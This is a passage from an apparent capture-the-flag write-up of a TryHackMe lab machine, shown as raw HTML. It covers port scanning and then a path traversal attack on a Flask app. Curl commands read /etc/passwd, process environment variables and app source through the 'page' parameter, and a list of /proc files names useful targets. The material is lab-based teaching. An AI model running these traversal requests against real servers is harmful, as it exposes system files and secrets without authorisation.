&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| .-. &lt;span style="color:#b8bb26">\|&lt;/span> &lt;span style="color:#fe8019">{&lt;/span>_&lt;span style="color:#fe8019">}&lt;/span> |.-._&lt;span style="color:#fe8019">}&lt;/span> &lt;span style="color:#fe8019">}&lt;/span> | | .-._&lt;span style="color:#fe8019">}&lt;/span> &lt;span style="color:#fe8019">}&lt;/span>&lt;span style="color:#b8bb26">\ &lt;/span> &lt;span style="color:#fe8019">}&lt;/span>/ /&lt;span style="color:#b8bb26">\ &lt;/span> &lt;span style="color:#b8bb26">\|&lt;/span> |&lt;span style="color:#b8bb26">\ &lt;/span> |
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">`&lt;/span>-&lt;span style="color:#b8bb26">&amp;#39; `-&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">`&lt;/span>-----&lt;span style="color:#b8bb26">&amp;#39;`----&amp;#39;&lt;/span> &lt;span style="color:#b8bb26">`&lt;/span>-&lt;span style="color:#b8bb26">&amp;#39; `----&amp;#39;&lt;/span> &lt;span style="color:#b8bb26">`&lt;/span>---&lt;span style="color:#b8bb26">&amp;#39; `-&amp;#39;&lt;/span> &lt;span style="color:#b8bb26">`&lt;/span>-&lt;span style="color:#b8bb26">&amp;#39;`-&amp;#39;&lt;/span> &lt;span style="color:#b8bb26">`&lt;/span>-&amp;#39;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>The Modern Day Port Scanner.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>________________________________________
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>: http://discord.skerritt.blog :
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>: https://github.com/RustScan/RustScan :
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> --------------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>😵 https://admin.tryhackme.com
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Open 10.10.121.174:22
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Open 10.10.121.174:6048
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Open 10.10.121.174:8000
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Enumerated open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>nmap -p22,8000,6048 -sC -sV --min-rate&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">10000&lt;/span> 10.10.121.174 -oA nmap/services
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Nmap 7.80 scan initiated Mon Jul 29 17:10:23 2024 as: nmap -p22,8000,6048 -sC -sV -vv --min-rate 10000 -oA nmap/services 10.10.121.174&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> airplane.thm &lt;span style="color:#fe8019">(&lt;/span>10.10.121.174&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received conn-refused &lt;span style="color:#fe8019">(&lt;/span>0.46s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-07-29 17:10:23 IST &lt;span style="color:#fe8019">for&lt;/span> 195s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>6048/tcp open x11? syn-ack
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>8000/tcp open http-alt syn-ack Werkzeug/3.0.2 Python/3.8.10
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| fingerprint-strings:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| FourOhFourRequest:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| HTTP/1.1 &lt;span style="color:#d3869b">404&lt;/span> NOT FOUND
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Server: Werkzeug/3.0.2 Python/3.8.10
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Date: Mon, &lt;span style="color:#d3869b">29&lt;/span> Jul &lt;span style="color:#d3869b">2024&lt;/span> 11:40:38 GMT
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Type: text/html; charset&lt;span style="color:#fe8019">=&lt;/span>utf-8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Length: &lt;span style="color:#d3869b">207&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Connection: close
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;!doctype html&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;html lang&lt;span style="color:#fe8019">=&lt;/span>en&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;title&amp;gt;404 Not Found&amp;lt;/title&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;h1&amp;gt;Not Found&amp;lt;/h1&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;p&amp;gt;The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.&amp;lt;/p&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| GetRequest:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| HTTP/1.1 &lt;span style="color:#d3869b">302&lt;/span> FOUND
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Server: Werkzeug/3.0.2 Python/3.8.10
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Date: Mon, &lt;span style="color:#d3869b">29&lt;/span> Jul &lt;span style="color:#d3869b">2024&lt;/span> 11:40:32 GMT
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Type: text/html; charset&lt;span style="color:#fe8019">=&lt;/span>utf-8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Length: &lt;span style="color:#d3869b">269&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Location: http://airplane.thm:8000/?page&lt;span style="color:#fe8019">=&lt;/span>index.html
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Connection: close
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;!doctype html&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;html lang&lt;span style="color:#fe8019">=&lt;/span>en&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;title&amp;gt;Redirecting...&amp;lt;/title&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;h1&amp;gt;Redirecting...&amp;lt;/h1&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;p&amp;gt;You should be redirected automatically to the target URL: &amp;lt;a href&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;http://airplane.thm:8000/?page=index.html&amp;#34;&lt;/span>&amp;gt;http://airplane.thm:8000/?page&lt;span style="color:#fe8019">=&lt;/span>index.html&amp;lt;/a&amp;gt;. If not, click the link.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Socks5:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;!DOCTYPE HTML PUBLIC &lt;span style="color:#b8bb26">&amp;#34;-//W3C//DTD HTML 4.01//EN&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &lt;span style="color:#b8bb26">&amp;#34;http://www.w3.org/TR/html4/strict.dtd&amp;#34;&lt;/span>&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;html&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;head&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;meta http-equiv&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;Content-Type&amp;#34;&lt;/span> content&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;text/html;charset=utf-8&amp;#34;&lt;/span>&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;title&amp;gt;Error response&amp;lt;/title&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;/head&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;body&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;h1&amp;gt;Error response&amp;lt;/h1&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;p&amp;gt;Error code: 400&amp;lt;/p&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;p&amp;gt;Message: Bad request syntax &lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">| &amp;#39;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>.&amp;lt;/p&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;p&amp;gt;Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.&amp;lt;/p&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &amp;lt;/body&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ &amp;lt;/html&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-methods:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Supported Methods: HEAD GET OPTIONS
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: Werkzeug/3.0.2 Python/3.8.10
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-title: About Airplanes
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_Requested resource was http://airplane.thm:8000/?page&lt;span style="color:#fe8019">=&lt;/span>index.html
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">1&lt;/span> service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>SF-Port8000-TCP:V&lt;span style="color:#fe8019">=&lt;/span>7.80%I&lt;span style="color:#fe8019">=&lt;/span>7%D&lt;span style="color:#fe8019">=&lt;/span>7/29%Time&lt;span style="color:#fe8019">=&lt;/span>66A77FB0%P&lt;span style="color:#fe8019">=&lt;/span>x86_64-pc-linux-gnu%r&lt;span style="color:#fe8019">(&lt;/span>Ge
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>SF:tRequest,1F3,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.1\x20302\x20FOUND\r\nServer:\x20Werkzeug/3\.0\.2\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:x20Python/3\.8\.10\r\nDate:\x20Mon,\x2029\x20Jul\x202024\x2011:40:32\x2
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:0GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\x20269\r\nLocation:\x20http://airplane\.thm:8000/\?page=index\.html\r\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:nConnection:\x20close\r\n\r\n&amp;lt;!doctype\x20html&amp;gt;\n&amp;lt;html\x20lang=en&amp;gt;\n&amp;lt;ti
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:tle&amp;gt;Redirecting\.\.\.&amp;lt;/title&amp;gt;\n&amp;lt;h1&amp;gt;Redirecting\.\.\.&amp;lt;/h1&amp;gt;\n&amp;lt;p&amp;gt;You\x20sh
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:ould\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x20URL
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF::\x20&amp;lt;a\x20href=\&amp;#34;http://airplane\.thm:8000/\?page=index\.html\&amp;#34;&amp;gt;http:/
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:/airplane\.thm:8000/\?page=index\.html&amp;lt;/a&amp;gt;\.\x20If\x20not,\x20click\x20
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:the\x20link\.\n&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>FourOhFourRequest,184,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.1\x20404\x20NOT\x20F
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:OUND\r\nServer:\x20Werkzeug/3\.0\.2\x20Python/3\.8\.10\r\nDate:\x20Mon,
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\x2029\x20Jul\x202024\x2011:40:38\x20GMT\r\nContent-Type:\x20text/html;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\x20charset=utf-8\r\nContent-Length:\x20207\r\nConnection:\x20close\r\n
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\r\n&amp;lt;!doctype\x20html&amp;gt;\n&amp;lt;html\x20lang=en&amp;gt;\n&amp;lt;title&amp;gt;404\x20Not\x20Found&amp;lt;/
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:title&amp;gt;\n&amp;lt;h1&amp;gt;Not\x20Found&amp;lt;/h1&amp;gt;\n&amp;lt;p&amp;gt;The\x20requested\x20URL\x20was\x20not
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\x20found\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20UR
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:L\x20manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x20a
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:gain\.&amp;lt;/p&amp;gt;\n&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>Socks5,213,&lt;span style="color:#b8bb26">&amp;#34;&amp;lt;!DOCTYPE\x20HTML\x20PUBLIC\x20\&amp;#34;-//W3C//D
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:TD\x20HTML\x204\.01//EN\&amp;#34;\n\x20\x20\x20\x20\x20\x20\x20\x20\&amp;#34;http://www
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\.w3\.org/TR/html4/strict\.dtd\&amp;#34;&amp;gt;\n&amp;lt;html&amp;gt;\n\x20\x20\x20\x20&amp;lt;head&amp;gt;\n\x20
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\x20\x20\x20\x20\x20\x20\x20&amp;lt;meta\x20http-equiv=\&amp;#34;Content-Type\&amp;#34;\x20con
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:tent=\&amp;#34;text/html;charset=utf-8\&amp;#34;&amp;gt;\n\x20\x20\x20\x20\x20\x20\x20\x20&amp;lt;tit
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:le&amp;gt;Error\x20response&amp;lt;/title&amp;gt;\n\x20\x20\x20\x20&amp;lt;/head&amp;gt;\n\x20\x20\x20\x20
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:&amp;lt;body&amp;gt;\n\x20\x20\x20\x20\x20\x20\x20\x20&amp;lt;h1&amp;gt;Error\x20response&amp;lt;/h1&amp;gt;\n\x2
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:0\x20\x20\x20\x20\x20\x20\x20&amp;lt;p&amp;gt;Error\x20code:\x20400&amp;lt;/p&amp;gt;\n\x20\x20\x20
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\x20\x20\x20\x20\x20&amp;lt;p&amp;gt;Message:\x20Bad\x20request\x20syntax\x20\(&amp;#39;\\x05
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\\x04\\x00\\x01\\x02\\x80\\x05\\x01\\x00\\x03&amp;#39;\)\.&amp;lt;/p&amp;gt;\n\x20\x20\x20\x2
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:0\x20\x20\x20\x20&amp;lt;p&amp;gt;Error\x20code\x20explanation:\x20HTTPStatus\.BAD_RE
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:QUEST\x20-\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:&amp;lt;/p&amp;gt;\n\x20\x20\x20\x20&amp;lt;/body&amp;gt;\n&amp;lt;/html&amp;gt;\n&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Read data files from: /usr/bin/../share/nmap
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Nmap done at Mon Jul 29 17:13:38 2024 -- 1 IP address (1 host up) scanned in 195.14 seconds&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h1 id="enumeration">Enumeration&lt;/h1>
&lt;h2 id="port-8000---http-flask-302">Port 8000 - HTTP (Flask 3.0.2)&lt;/h2>
&lt;p>Going to port 8000 redirect us to &lt;code>airplane.thm:8000/?page=index.html&lt;/code>
Let&amp;rsquo;s add &lt;code>airplane.thm&lt;/code> to &lt;code>/etd/hosts&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;10.10.121.174\tairplane.thm&amp;#39;&lt;/span> | sudo tee -a /etc/hosts
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729170637.webp" alt="">&lt;hr>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="path-traversal">Path traversal&lt;/h2>
&lt;p>After seeing the &lt;code>page&lt;/code> parameter I first tried path traversal.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729171235.webp" alt="">&lt;p>It worked. I am using &lt;a href="https://httpie.io/">httpie&lt;/a> btw.&lt;/p>
&lt;p>Since the website is running on flask I tried if we can access &lt;code>/console&lt;/code>. Often if we have
access to the debug console we can use path traversal to get some system information for
generating the console pin and getting a remote shell.
You can check &lt;a href="https://www.daehee.com/blog/werkzeug-console-pin-exploit">this article&lt;/a> to find more about this attack.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729171659.webp" alt="">&lt;p>But as you can see the debug mode is not enabled.&lt;/p>
&lt;p>Next I tried to retrieve ssh keys if there&amp;rsquo;s any. From the &lt;code>/etc/passwd&lt;/code> file we can see that there are 3 users: &lt;code>root&lt;/code>, &lt;code>carlos&lt;/code>, and &lt;code>hudson&lt;/code>&lt;/p>
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729172000.webp" alt="">&lt;p>It does not exists or the current user can&amp;rsquo;t access it maybe because we are &lt;code>www-data&lt;/code> or something. In linux if we have a path traversal we can use some files in the &lt;code>/proc&lt;/code> directory to retrieve valuable informations about the machine.
Check &lt;a href="https://0xffsec.com/handbook/web-applications/file-inclusion-and-path-traversal/#the-proc-file-system">this article&lt;/a> for more info about this attack vector. Here are some of the locations that you can check:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-gdscript3" data-lang="gdscript3">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">/&lt;/span>proc&lt;span style="color:#fe8019">/&lt;/span>version &lt;span style="color:#fe8019">-&lt;/span> Kernel version
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">/&lt;/span>proc&lt;span style="color:#fe8019">/&lt;/span>self&lt;span style="color:#fe8019">/&lt;/span>environ &lt;span style="color:#fe8019">-&lt;/span> &lt;span style="color:#fb4934">Environment&lt;/span> variables of the current process
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">/&lt;/span>proc&lt;span style="color:#fe8019">/&lt;/span>self&lt;span style="color:#fe8019">/&lt;/span>cmdline &lt;span style="color:#fe8019">-&lt;/span> Process invocation command with parameters
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">/&lt;/span>proc&lt;span style="color:#fe8019">/&lt;/span>self&lt;span style="color:#fe8019">/&lt;/span>cwd&lt;span style="color:#fe8019">/&lt;/span> &lt;span style="color:#fe8019">-&lt;/span> Points to the current working directory
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">/&lt;/span>proc&lt;span style="color:#fe8019">/&lt;/span>sched_debug &lt;span style="color:#fe8019">-&lt;/span> Scheduling information &lt;span style="color:#fe8019">and&lt;/span> running processes per CPU
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729174648.webp" alt="">&lt;p>Unfortunately &lt;code>http&lt;/code> does not output binary data. Note that the content of the &lt;code>/proc/self/environ&lt;/code> is marked as binary data because it is using null bytes as a seperator instead
of using new line (&lt;code>\n&lt;/code>) or space.
So back to &lt;code>curl&lt;/code> again&amp;hellip;&lt;/p>
&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729175501.webp" alt="">&lt;p>To fix the output we can easily pipe that into sed and replace the null bytes to new line characters to get a clean output.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>curl --path-as-is &lt;span style="color:#b8bb26">&amp;#39;10.10.121.174:8000/?page=../../../../../../proc/self/environ&amp;#39;&lt;/span> --silent --output - | sed -e &lt;span style="color:#b8bb26">&amp;#39;s/\x0/\n/g&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># When dealing with stdin we use -e or --expression instead of -i&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># The format is like `s/find/replace/g`&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># s -&amp;gt; search&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># \x0 -&amp;gt; null byte&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># \n -&amp;gt; new line&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># g -&amp;gt; means global, all occurances will be replaced&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/airplane/Pasted%20image%2020240729175615.webp" alt="">&lt;p>We can see that the current user is &lt;code>hudson&lt;/code>. We already checked the ssh key in the home directory of hudson.
And now we can confirm that it does not exist.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>curl --path-as-is &lt;span style="color:#b8bb26">&amp;#39;10.10.121.174:8000/?page=../../../../../../proc/self/cmdline&amp;#39;&lt;/span> --silent --output - | sed -e &lt;span style="color:#b8bb26">&amp;#39;s/\x0/\n/g&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>/usr/bin/python3
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>app.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>I tried to read the content of the &lt;code>app.py&lt;/code> file&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>curl --path-as-is &lt;span style="color:#b8bb26">&amp;#39;10.10.121.174:8000/?page=../../../../../../proc/self/cwd/app.py&amp;#39;&lt;/span> --silent --output - | sed -e &lt;span style="color:#b8bb26">&amp;#39;s/\x0/\n/g&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-python" data-lang="python">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">from&lt;/span> flask &lt;span style="color:#fe8019">import&lt;/span> Flask, send_file, redirect, render_template, request
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> os.path
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>app &lt;span style="color:#fe8019">=&lt;/span> Flask(__name__)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>@app.route(&lt;span style="color:#b8bb26">&amp;#39;/&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">index&lt;/span>():
